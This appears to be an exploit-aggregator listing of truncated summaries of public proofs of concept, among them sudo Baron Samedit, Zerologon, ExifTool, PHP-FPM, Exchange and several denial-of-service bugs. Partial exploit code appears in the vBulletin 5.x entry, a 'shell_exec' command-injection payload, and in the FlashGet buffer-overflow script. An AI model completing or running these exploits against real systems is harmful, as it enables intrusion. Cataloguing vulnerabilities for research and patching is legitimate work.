Exploit for Out-of-bounds Write in Qemu

This repository contains PoCs Proof of Concepts for two vulnerabilities: CVE-2020-14364 Qemu and CVE-2020-1472 Zerologon. CVE-2020-14364 Qemu The Qemu PoC is a C code that exploits a vulnerability in the Qemu emulator. The code includes two files: exp1irq.c and exp2configread.c. These files appea...

writeup

This is a Python script for exploiting a vulnerability in the "Aegis" binary. The script is designed to be used with the "pwn" library, which is a Python library for exploitation. The script starts by setting a debug flag to 1, which means that the script will run in debug mode. If the debug flag...

Notex the best notes 6.4 - Denial of Service (PoC)

Exploit Title: Notex the best notes 6.4 - Denial of Service PoC Date: 06-14-2021 Author: Geovanni Ruiz Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 Version: 6.4 Category: DoS iOS Vulnerability Notex – the best notes is vulnerable to a DoS condition when a long lis...

Blacknote 2.2.1 - Denial of Service (PoC)

Exploit Title: Blacknote 2.2.1 - Denial of Service PoC Date: 2021-06-02 Author: Brian Rodríguez Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=esMX Version: 2.2.1 Category: DoS Android Vulnerability BlackNote Bloc de notas is vulnerable to a DoS...

iDailyDiary 4.30 - Denial of Service (PoC)

Exploit Title: iDailyDiary 4.30 - Denial of Service PoC Date: 2021-05-21 Exploit Author: Ismael Nava Vendor Homepage: https://www.splinterware.com/index.html Software Link: https://www.splinterware.com/download/iddfree.exe Version: 4.30 Tested on: Windows 10 Home x64 STEPS Open the program...

Exploit for Code Injection in Exiftool_Project Exiftool

CVE-2021-22204-exiftool Python exploit for the CVE-2021-22204...

Exploit for Off-by-one Error in Sudo_Project Sudo

This is a Python-based exploit for the CVE-2021-3156 vulnerability in sudo. The exploit targets Linux systems with glibc and nscd service not running. It overwrites the struct serviceuser to gain root privileges. The exploit has several variants, including: 1. exploitnss.py: This is the main...

Exploit for Off-by-one Error in Sudo_Project Sudo

This is a Python script repository for exploiting the CVE-2021-3156 vulnerability in sudo. The vulnerability is a heap-based overflow in the sudo package, which can be exploited to gain root privileges. The repository contains several exploit scripts, each targeting a specific version of the sudo...

Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)

Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service PoC Date: 2021-02-15 Exploit Author: Ismael Nava Vendor Homepage: https://www.nsauditor.com/ Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Version: 3.2.2.0 Tested on: Windows 10 Home x64 STEPS Open the...

Managed Switch Port Mapping Tool 2.85.2 Denial Of Service

Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service PoC Date: 2021-02-15 Exploit Author: Ismael Nava Vendor Homepage: https://switchportmapper.com/ Software Link: https://switchportmapper.com/download.htm Version: 2.85.2 Tested on: Windows 10 Home x64 STEPS Open the program...

Sploit - Go Package That Aids In Binary Analysis And Exploitation

Sploit is a Go package that aids in binary analysis and exploitation. The motivating factor behind the development of sploit is to be able to have a well designed API with functionality that rivals some of the more common Python exploit development frameworks while taking advantage of the Go...

Exploit for Unrestricted Upload of File with Dangerous Type in Apache Activemq

This repository is an offensive tool for collecting or writing various vulnerability PoCs proofs of concept and exploits. The primary vulnerability addressed by the repository is CNVD-2020-10487, a Tomcat-Ajp local file inclusion LFI vulnerability. The repository contains two main files:...

YATinyWinFTP Denial Of Service

Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Date: 20.08.2020 Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10...

vBulletin 5.x Remote Code Execution

!/usr/bin/env python3 vBulletin 5.x pre-auth widgettabbedContainer RCE exploit by @zenofex import argparse import requests import sys def runexploitvbloc, shellcmd: postdata = 'subWidgets0template' : 'widgetphp', 'subWidgets0configcode' : "echo shellexec'%s'; exit;" % shellcmd r =...

pwntools

It is an offensive tool for binary exploitation. The repository contains the pwntools project, a Python library for binary exploitation. The primary vulnerability class targeted by this tool is RCE Remote Code Execution. The probable entry points for this tool are the exploit.py script and the...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

PoC exploit for CVE-2017-11826, a Microsoft Office Word vulnerability allowing arbitrary code execution through DDE injection. The exploit targets Microsoft Office Word, specifically the vulnerability class of remote code execution RCE via DDE Dynamic Data Exchange injection. The probable entry...

vBulletin 5.6.1 - 'nodeId' SQL Injection

Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection Date: 2020-05-15 Exploit Author: Photubias Vendor Advisory: 1 https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcementsaa/4440032-vbulletin-5-6-1-security-patch-level-1 Version: vBulletin v5.6.x prior to Patch Level 1...

Exploit for Out-of-bounds Write in Php

PoC CVE-2019-11043 A Python implementation of the CVE-2019-110...

FlashGet 1.9.6 Buffer Overflow PoC Exploit

!/usr/bin/python Exploit Title: FlashGet 1.9.6 0day Remote Buffer Overflow Author: Milad Karimi Testen on: Kali Linux Software Link: http://www.flashget.com/en/download.htm?uid=undefined Version: 1.9.6 CVE : N/A from time import sleep from socket import res = '220 WELCOME!! :x\r\n', '331 Password...

Exploit for Improper Authentication in Microsoft

CVE-2020-0688 Working Exploit PoC CVE-202...